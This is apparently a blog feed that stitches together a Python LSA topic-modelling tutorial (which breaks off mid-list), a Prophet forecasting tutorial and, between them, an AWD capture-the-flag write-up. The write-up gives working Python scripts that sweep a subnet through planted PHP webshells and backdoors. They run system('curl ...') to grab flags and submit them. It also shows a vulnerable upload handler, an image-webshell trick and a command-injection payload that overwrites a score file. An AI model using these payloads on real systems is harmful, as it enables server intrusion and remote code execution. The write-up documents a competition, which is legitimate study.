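    if norm_u == 0 or norm_v == 0:
        return 0.0  # convention chosen here for all-zero vectors
    return dot / (norm_u * norm_v)

# Made-up 3-topic vectors (k = 3) for three documents.
doc_a = [0.9, 0.1, 0.0]
doc_b = [0.8, 0.2, 0.1]
doc_c = [0.0, 0.1, 0.9]

sim_ab = cosine_similarity(doc_a, doc_b)
sim_ac = cosine_similarity(doc_a, doc_c)
print(round(sim_ab, 3), round(sim_ac, 3))
```

Documents a and b load on the same topic and score close to 1, while a and c load on different topics and score close to 0.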

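Implementing LSA in Python

It's time to fire up Python and see how to apply LSA to a topic modeling problem. Once your Python environment is open, follow the steps below.

Data reading and inspection

Before we start, let's load the required libraries.

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

pd.set_option("display.max_colwidth", 200)

In this article we use the "20 Newsgroups" dataset from sklearn. You can download it and then follow along with the code (fetch_20newsgroups also fetches it automatically on first use).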

from sklearn.datasets import fetch_20newsgroups

dataset = fetch_20newsgroups(shuffle=True, random_state=1, remove=('headers', 'footers', 'quotes'))
documents = dataset.data
len(documents)

Output: 11,314

dataset.target_names

['alt.atheism',
 'comp.graphics',
 'comp.os.ms-windows.misc',
 'comp.sys.ibm.pc.hardware',
 'comp.sys.mac.hardware',
 'comp.windows.x',
 'misc.forsale',
 'rec.autos',
 'rec.motorcycles',
 'rec.sport.baseball',
 'rec.sport.hockey',
 'sci.crypt',
 'sci.electronics',
 'sci.med',
 'sci.space',
 'soc.religion.christian',
 'talk.politics.guns',
 'talk.politics.mideast',
 'talk.politics.misc',
 'talk.religion.misc']

The dataset contains 11,314 documents spread across 20 different newsgroups.

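Data preprocessing

To start with, we will clean the text data as much as possible. The idea is to remove all punctuation, digits, and special characters in one step with the regular-expression replacement replace("[^a-zA-Z#]", " "), which replaces everything except letters (and "#") with a space. We then remove short words, because they usually carry little useful information. Finally, we lowercase all the text so that case no longer matters.

news_df = pd.DataFrame({'document': documents})

# remove everything except letters
# (regex=True is needed on recent pandas versions, where str.replace defaults to literal matching)
news_df['clean_doc'] = news_df['document'].str.replace("[^a-zA-Z#]", " ", regex=True)

# remove short words (three characters or fewer)
news_df['clean_doc'] = news_df['clean_doc'].apply(lambda x: ' '.join([w for w in x.split() if len(w) > 3]))

# make all text lowercase
news_df['clean_doc'] = news_df['clean_doc'].apply(lambda x: x.lower())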
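To see what these three steps do to a single document, here is the same cleaning applied to one string with the standard re module. The function name clean_document, its min_length parameter, and the sample sentence are illustrative assumptions.

```python
import re

def clean_document(text, min_length=4):
    """Apply the three cleaning steps to one string."""
    # 1. Replace everything except letters and '#' with a space.
    text = re.sub(r"[^a-zA-Z#]", " ", text)
    # 2. Keep only words with at least `min_length` characters (same as len(w) > 3).
    words = [w for w in text.split() if len(w) >= min_length]
    # 3. Lowercase the result.
    return " ".join(words).lower()

sample = "Re: My 2nd SCSI drive (1.2GB) won't boot!!"
cleaned = clean_document(sample)
print(cleaned)
```

Note how the apostrophe splits "won't" into "won" and "t", both of which are then dropped as short words; that is a side effect of this simple regular expression.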

It is a good idea to remove stop words from the text data, as they are mostly clutter and carry hardly any information. Stop words are terms such as 'it', 'they', 'am', 'been', 'about', 'because', and 'while'.

To remove stop words from the documents we first have to tokenize the text, i.e. split each string into individual tokens or words. Once the stop words are removed, we stitch the tokens back together.

from nltk.corpus import stopwords

stop_words = stopwords.words('english')

# tokenization
tokenized_doc = news_df['clean_doc'].apply(lambda x: x.split())

# remove stop words
tokenized_doc = tokenized_doc.apply(lambda x: [item for item in x if item not in stop_words])

# de-tokenization
detokenized_doc = []
for i in range(len(news_df)):
    t = ' '.join(tokenized_doc[i])
    detokenized_doc.append(t)

news_df['clean_doc'] = detokenized_doc

Document-Term Matrix

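This is the first step towards topic modeling. We will use sklearn's TfidfVectorizer to create a document-term matrix with 1,000 terms.

from sklearn.feature_extraction.text import TfidfVectorizer

vectorizer = TfidfVectorizer(stop_words='english',
                             max_features=1000,  # keep top 1000 terms
                             max_df=0.5,
                             smooth_idf=True)

X = vectorizer.fit_transform(news_df['clean_doc'])

X.shape  # check shape of the document-term matrix

(11314, 1000)

We could have used all the terms to build this matrix, but that would take considerably longer to compute and use a lot of resources, so we have limited the number of features to 1,000. If you have the computing power, I suggest trying it with all the terms.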
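For intuition about what the entries of a document-term matrix look like, here is a tiny pure-Python sketch using the textbook definition, tf × log(N / df). This is an assumption made for illustration: sklearn's TfidfVectorizer uses a smoothed IDF and normalizes each row, so its numbers will differ. The three toy documents are made up.

```python
import math
from collections import Counter

def tfidf_matrix(docs):
    """Build a small document-term matrix with textbook TF-IDF weights."""
    tokenized = [doc.split() for doc in docs]
    vocab = sorted({word for tokens in tokenized for word in tokens})
    n_docs = len(docs)
    # Document frequency: number of documents each term appears in.
    df = Counter(word for tokens in tokenized for word in set(tokens))
    matrix = []
    for tokens in tokenized:
        counts = Counter(tokens)
        row = []
        for term in vocab:
            tf = counts[term] / len(tokens)
            idf = math.log(n_docs / df[term])
            row.append(tf * idf)
        matrix.append(row)
    return vocab, matrix

docs = ["space nasa launch", "nasa space shuttle", "hockey game season"]
vocab, matrix = tfidf_matrix(docs)
print(vocab)
print(len(matrix), len(matrix[0]))  # m documents x n terms
```

Terms that appear in only one document ("launch") get a higher weight than terms shared across documents ("nasa"), and terms absent from a document get zero.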

Topic modeling

The next step is to represent each term and each document as a vector. We will take the document-term matrix and decompose it into multiple matrices, using sklearn's TruncatedSVD to perform the matrix decomposition.

Since the data comes from 20 different newsgroups, let's try to extract 20 topics from the text data. The number of topics can be specified with the n_components parameter.

from sklearn.decomposition import TruncatedSVD

# SVD represent documents and terms in vectors
svd_model = TruncatedSVD(n_components=20, algorithm='randomized', n_iter=100, random_state=122)

svd_model.fit(X)

len(svd_model.components_)

The components of svd_model are our topics, and we can access them through svd_model.components_. Finally, let's print the few most important words in each of the 20 topics and see how our model has done.

# on scikit-learn 1.0 and later, use vectorizer.get_feature_names_out() instead
terms = vectorizer.get_feature_names()

for i, comp in enumerate(svd_model.components_):
    terms_comp = zip(terms, comp)
    sorted_terms = sorted(terms_comp, key=lambda x: x[1], reverse=True)[:7]
    print("Topic " + str(i) + ": ")
    for t in sorted_terms:
        print(t[0])
        print(" ")

Topic 0: like know people think good time thanks
Topic 1: thanks windows card drive mail file advance
Topic 2: game team year games season players good
Topic 3: drive scsi disk hard card drives problem
Topic 4: windows file window files program using problem
Topic 5: government chip mail space information encryption data
Topic 6: like bike know chip sounds looks look
Topic 7: card sale video offer monitor price jesus
Topic 8: know card chip video government people clipper
Topic 9: good know time bike jesus problem work
Topic 10: think chip good thanks clipper need encryption
Topic 11: thanks right problem good bike time window
Topic 12: good people windows know file sale files
Topic 13: space think know nasa problem year israel
Topic 14: space good card people time nasa thanks
Topic 15: people problem window time game want bike
Topic 16: time bike right windows file need really
Topic 17: time problem file think israel long mail
Topic 18: file need card files problem right good
Topic 19: pr

↧

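Notes from the Huxiang Cup offline AWD

December 8, 2018, 12:20 am

≫ Next: Time series forecasting with Prophet

≪ Previous: Implementing Latent Semantic Analysis in Python

We found a China Chopper-style webshell, .shell.php, with the password c. It was created with root privileges and a scheduled task kept rewriting it, so it could not be removed for good; one option is to write a while loop that keeps deleting it. We then used .shell.php to collect flags in bulk.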

#coding=utf-8
import requests
import re
from gevent import pool
from gevent import monkey
from gevent import lock
monkey.patch_all()

port = "80"
# outer double quotes so the inner single quotes do not end the string
payload = {"c": "system('curl http://172.16.0.225:8000/flag');"}
heads = {"cookie": "PHPSESSID=censulo0283idutu58ap6lvem7; xdgame_username=hacker"}

def f(flag):
    # submit a flag to the scoreboard and return the page title
    data = {"key": flag}
    try:
        req = requests.post("http://172.16.0.225/index.php/wargame/submit", data=data, headers=heads, timeout=2)
        title = re.findall('<title>(.*?)</title>', req.text, re.S)
        return title
    except Exception as e:
        pass

webshelllist = open("webshelllist.txt", "w")
flag = open("firstround_flag.txt", "w")

def get_(ip):
    url = "http://%s/.shell.php" % ip
    try:
        res = requests.post(url, payload, timeout=2)
        print(ip, f(str(res.text)), res.text, "bbb")
    except Exception as e:
        pass

def get_1(ip):
    url = "http://%s/.config.php" % ip
    payloads = {"cmd": "system('curl http://172.16.0.225:8000/flag');"}
    try:
        res = requests.post(url, payloads, timeout=2)
        if res.text:
            print(ip, f(str(res.text)), "aaa")
    except Exception as e:
        pass

pl = pool.Pool(254)
ipl = ["172.16.0.%s" % x for x in range(0, 254)]
pl.map(get_, ipl)
pl.join()
webshelllist.close()
flag.close()

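I handed the script to a teammate to run and went on auditing the code. Searching for the eval keyword turned up one more backdoor.

I then wrote code to keep collecting flags in bulk. Many contestants may only have realized late on that the IP ranges were 172.16.0.0/24 and 172.16.1.0/24.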

import requests
import re
from gevent import pool
from gevent import monkey
monkey.patch_all()

heads = {"cookie": "PHPSESSID=censulo0283idutu58ap6lvem7; xdgame_username=hacker",
         "User-Agent": "hacker"}
proxy = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

def f(flag):
    # submit a flag to the scoreboard and return the page title
    data = {"key": flag}
    try:
        req = requests.post("http://172.16.0.225/index.php/wargame/submit", data=data, headers=heads, timeout=2)
        title = re.findall('<title>(.*?)</title>', req.text, re.S)
        return title
    except Exception as e:
        f(flag)  # retry on failure

def get_(ip):
    url = "http://%s/3/gcount/styles/.web2/?a=system('curl http://172.16.0.225:8000/flag');" % ip
    try:
        res = requests.post(url, timeout=2)
        print(res.status_code)
        if res.status_code == 200:
            print(ip, f(str(res.text.strip())), res.text, "bbb")
    except Exception as e:
        pass

pl = pool.Pool(100)
ipl = ["172.16.0.%s" % x for x in range(0, 254)]
#ipl = ["172.16.1.%s" % x for x in range(0, 254)]
pl.map(get_, ipl)
pl.join()
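One detail worth noting: range(0, 254) yields the last octets 0 through 253, so .254 is never tried while .0 (the network address) is. A minimal sketch with the standard ipaddress module, assuming the two ranges are 172.16.0.0/24 and 172.16.1.0/24; the helper name host_list is made up for illustration.

```python
import ipaddress

def host_list(cidr):
    """Return every usable host address in the network as a string."""
    network = ipaddress.ip_network(cidr)
    # hosts() skips the network and broadcast addresses.
    return [str(host) for host in network.hosts()]

ipl = host_list("172.16.0.0/24") + host_list("172.16.1.0/24")
print(len(ipl), ipl[0], ipl[-1])
```

Building the list this way also covers both ranges in one pass instead of switching the commented-out line by hand.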

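Using this backdoor, we racked up points furiously during the final hour and climbed from eleventh to second place by the end. Later we brute-forced MySQL and found that many teams had never changed their MySQL password.

That was the end of the first AWD round.

Afternoon round

This was my first time in this kind of competition. The rules: write your team's token into the file Hill/SCORE_POINTS under the web directory. The servers are reset every half hour and checked every 5 minutes, and whichever team's token is in the file at check time scores.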

web1.humensec.com
web2.humensec.com
web3.humensec.com
web4.humensec.com
web5.humensec.com
pwn1.humensec.com
pwn2.humensec.com
pwn3.humensec.com

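At first we tested the targets for vulnerabilities one by one, but for the first two hours our team could barely get the challenges to load, so all we could do was scan other contestants' port 80 for fun. We came across people hosting a WooYun knowledge-base mirror, CTF notes, all sorts of DVWA installs...

""" one hour omitted """

Later we found that the web sites all allowed directory listing, and the upload directory showed traces of other people's uploads. We kept refreshing until a webshell appeared, then brute-forced someone else's webshell and took web1.humensec.com. We promptly pulled down the source code and gave it a quick audit:

Knowing that the others had got their webshell through arbitrary file upload, we searched the source directly for "upload".

Code: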

<?php
/* Note: This thumbnail creation script requires the GD PHP Extension.
   If GD is not installed correctly PHP does not render this page correctly
   and SWFUpload will get "stuck" never calling uploadSuccess or uploadError
*/
// Get the session Id passed from SWFUpload. We have to do this to work-around the Flash Player Cookie Bug
@set_time_limit(0);
@error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
ini_set('html_errors', '0');
define('SYSTEM_ROOT', str_replace("\\", '/', substr(dirname(__FILE__), 0, -10)));
include SYSTEM_ROOT.'include/common.inc.php';
if (isset($_POST["PHPSESSID"])) {
    session_id($_POST["PHPSESSID"]);
}
session_start();
ini_set("html_errors", "0");
// Check the upload
if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
    echo "err-1";
    exit(0);
}
if (!is_array(@getimagesize($_FILES["Filedata"]["tmp_name"])))
{
    echo "err-2";
    exit(0);
}
if (!isset($_SESSION["file_info"])) {
    $_SESSION["file_info"] = array();
}
$fileName = $_userid.'_'.time().mt_rand(10000,99999).'.'.strtolower(get_fileext($_FILES["Filedata"]["name"]));
$path = date('Y-m-d', time()).'/';
@mkdir(SYSTEM_ROOT.'upload/image/'.$path);
move_uploaded_file($_FILES["Filedata"]["tmp_name"], "../../upload/image/".$path.$fileName);
// add watermark
setwatermark(SYSTEM_ROOT.'upload/image/'.$path.$fileName);
echo "FILEID:" . $path.$fileName;
exit(0);
?>

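All it takes is uploading a composite image webshell ( copy 1.jpg/b + 1.php new.jpg ) to get a shell. After that it was just a matter of rewriting the SCORE_POINTS file over and over... (Beijing Bangbang (梆梆) and Anheng (安恒) kept fighting us for it, and neither ended up with as many points as we did, hahahaha)

?ccc=system('echo "team name">/var/www/Hill/SCORE_POINTS');

Tip: refreshing with IE6 is blazingly fast.

From 0 points we kept refreshing all the way up to fourth place. That was the end of the second round, netkoth.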

↧

Time series forecasting with Prophet

December 8, 2018, 12:18 am

≫ Next: gamingdirectional: Create the about scene for pygame project

≪ Previous: Notes from the Huxiang Cup offline AWD

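Prophet is Facebook's open-source forecasting tool. Compared with an ARIMA model, Prophet is really very simple: reading in two columns of data is enough to produce a forecast, and in some settings its accuracy is on a par with ARIMA. Prophet is available for both R and Python; this post covers the Python version. See the official site for more information.

Installing Prophet

fbprophet is the Python package for Prophet. Getting fbprophet working is not as simple as you might expect, and errors are especially likely on Windows. The main reason is that fbprophet depends on pystan, which in turn depends on cython, and the installation tends to get stuck at pystan.

The correct installation order is:

pip install cython
pip install pystan
pip install fbprophet

Installing pystan produces the following error: WARNING:pystan:MSVC compiler is not supported. The reason is given in the official documentation:

PyStan is partially supported under Windows with the following caveats:

Python 2.7: Doesn't support parallel sampling. (When drawing samples n_jobs=1 must be used.)
Python 3.5 or higher: Parallel sampling is supported.
MSVC compiler is not supported.

PyStan requires a working C++ compiler. Configuring such a compiler is typically the most challenging step in getting PyStan running. PyStan is tested against the MingW-w64 compiler which works on both Python versions (2.7, 3.x) and supports x86 and x64.

Due to problems with MSVC template deduction, functions with Eigen library are failing. Until this and other bugs are fixed no support is provided for Windows + MSVC. Currently, no fix is known for this problem, other than to change the compiler to GCC or clang-cl.

The fix is to switch Python's build toolchain to MingW-w64.

Download and install MingW-w64. Download page: https://osdn.net/projects/mingw/releases/

Add the mingw path to the PATH environment variable. Example path: C:\mingw-w64\x86_64-7.1.0-posix-seh-rt_v5-rev0\mingw64\bin

Verify that the toolchain works by running the following commands in cmd: gcc -dumpversion, ld -v, dllwrap -version

Change Python's internal compiler setting: in the distutils directory of the Python installation (example: C:\Python36\Lib\distutils), create a cfg file (typically named distutils.cfg) with the following contents:

[build]
compiler = mingw32

Then run the installation again. In an Anaconda environment you also need to run the following in addition to the steps above:

conda update conda
conda install libpython m2w64-toolchain -c msys2

Using Prophet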

Dataset: https://pan.baidu.com/s/1Pw8ZSQgD8vLJjiQUhIJv_A (extraction code: taav)

import pandas as pd
from fbprophet import Prophet
import matplotlib.pyplot as plt

data = pd.read_csv('AirPassengers.csv', parse_dates=['Month'])
print(data.head())

       Month  AirPassengers
0 1949-01-01            112
1 1949-02-01            118
2 1949-03-01            132
3 1949-04-01            129
4 1949-05-01            121

Prophet's input must be a data frame with two columns: ds and y. The ds column holds dates or timestamps, and the y column must be numeric and represents the quantity we want to forecast. So after loading the data we need to rename the columns:

data = data.rename(columns={'Month': 'ds', 'AirPassengers': 'y'})
print(data.head())

          ds    y
0 1949-01-01  112
1 1949-02-01  118
2 1949-03-01  132
3 1949-04-01  129
4 1949-05-01  121

Take a look at the data:

ax = data.set_index('ds').plot(figsize=(12, 6))
ax.set_ylabel('Monthly Number of Airline Passengers')
ax.set_xlabel('Date')
plt.show()

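Prophet follows the sklearn model API. We create an instance of the Prophet class and then call its fit and predict methods. By default, Prophet returns an uncertainty interval for the forecast value yhat. These intervals rest on several important assumptions. There are three sources of uncertainty in the forecast: uncertainty in the trend, uncertainty in the seasonality estimates, and observation noise.

Uncertainty in the trend

The biggest source of uncertainty in a forecast is the potential for future trend changes. The time series in the earlier tutorials show clear trend changes in their history. Prophet can detect and fit these, but what trend changes should we expect going forward? That is impossible to know for sure, so we do the most reasonable thing we can and assume that the future will see trend changes similar to those in the history. In particular, we assume that the average frequency and magnitude of future trend changes will match what we observe in the history. We project these trend changes forward and, by computing their distribution, obtain uncertainty intervals. One property of this way of measuring uncertainty is that allowing more flexibility in the rate of change increases the forecast uncertainty. The reason is that if the model captures more rate changes in the history, we expect more of them in the future too, which makes the uncertainty intervals a useful indicator of overfitting. The width of the uncertainty intervals (80% by default) can be set with the interval_width parameter:

my_model = Prophet(interval_width=0.95)  # use a 95% uncertainty interval (the default is 80%)
my_model.fit(data)

Because the intervals assume that the future will see the same frequency and magnitude of rate changes as the past, and that assumption is probably not true, you should not expect them to have exact coverage.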
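To get a feel for what interval_width controls, here is a rough standard-library sketch. It assumes the interval bounds are taken as the (1 - w)/2 and (1 + w)/2 quantiles of simulated forecasts, which is my understanding of how yhat_lower and yhat_upper are derived; the Gaussian samples and the helper name uncertainty_interval are made up for illustration and do not come from Prophet.

```python
import random

def uncertainty_interval(samples, interval_width=0.80):
    """Return the (lower, upper) empirical quantiles that bracket `interval_width`."""
    ordered = sorted(samples)
    lower_q = (1.0 - interval_width) / 2.0
    upper_q = (1.0 + interval_width) / 2.0
    # Nearest-rank lookup; real libraries usually interpolate between ranks.
    last = len(ordered) - 1
    lower = ordered[int(round(lower_q * last))]
    upper = ordered[int(round(upper_q * last))]
    return lower, upper

rng = random.Random(0)
# Made-up simulated forecasts for one future date.
simulated = [rng.gauss(600.0, 40.0) for _ in range(2000)]

low80, high80 = uncertainty_interval(simulated, 0.80)
low95, high95 = uncertainty_interval(simulated, 0.95)
print(round(high80 - low80, 1), round(high95 - low95, 1))
```

The 95% interval is wider than the 80% one because it has to bracket more of the simulated outcomes.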

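Uncertainty in seasonality

By default, Prophet only returns uncertainty in the trend and observation noise. To get uncertainty in the seasonality you must do full Bayesian sampling, which is enabled by setting the mcmc_samples parameter (0 by default).

my_model = Prophet(interval_width=0.95, mcmc_samples=500)  # 95% uncertainty interval (default 80%), with MCMC sampling
my_model.fit(data)

This replaces the usual maximum a posteriori (MAP) estimation with Markov chain Monte Carlo (MCMC) sampling. Afterwards, the uncertainty in the seasonal components is visible when you plot them.

Observation noise

The best way to handle outliers is to remove them, and Prophet has no problem with missing data. If a row in the history has an empty (NA) value but its date is still kept in the future data frame passed for prediction, Prophet will still give a prediction for that row.

Predictions are made on a data frame with a ds column containing the dates for which a forecast is wanted. The make_future_dataframe function takes the model object and a number of periods to forecast and builds a suitable data frame of those dates. By default it also includes the dates from the history, so it can be used to examine the in-sample fit as well.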
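As an illustration of which dates end up in such a frame, the sketch below builds month-start dates in plain Python for this dataset: 144 monthly rows of history from January 1949, plus 36 further periods. The helper month_starts is made up for this example and is not part of Prophet.

```python
from datetime import date

def month_starts(first, count):
    """Return `count` consecutive month-start dates beginning at `first`."""
    dates = []
    year, month = first.year, first.month
    for _ in range(count):
        dates.append(date(year, month, 1))
        # Advance one month, rolling over into the next year after December.
        month += 1
        if month > 12:
            month = 1
            year += 1
    return dates

# AirPassengers has 144 monthly rows, from 1949-01 to 1960-12.
history = month_starts(date(1949, 1, 1), 144)
future = month_starts(date(1949, 1, 1), 144 + 36)  # history plus 36 new periods
print(len(future), future[0], future[-1])
```

The resulting 180 dates run from 1949-01-01 to 1963-12-01, with the historical dates at the front.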

future_dates = my_model.make_future_dataframe(periods=36, freq='MS')
print(future_dates.head())

          ds
0 1949-01-01
1 1949-02-01
2 1949-03-01
3 1949-04-01
4 1949-05-01

Prophet uses the generic predict function to make forecasts (e.g. forecast = my_model.predict(future_dates)). The result, forecast, is a data frame containing the forecast value yhat, along with further columns holding the uncertainty intervals and the seasonal components.

            ds        yhat  yhat_lower  yhat_upper
175 1963-08-01  659.473243  592.176200  726.973325
176 1963-09-01  613.132606  542.378855  677.590035
177 1963-10-01  576.340290  505.417141  642.690391
178 1963-11-01  545.832790  478.427462  610.037598
179 1963-12-01  575.599488  501.734482  649.450637

View the forecast: my_model.plot(forecast, uncertainty=True)

View the components: my_model.plot_components(forecast)

Further reading: https://facebook.github.io/prophet/

↧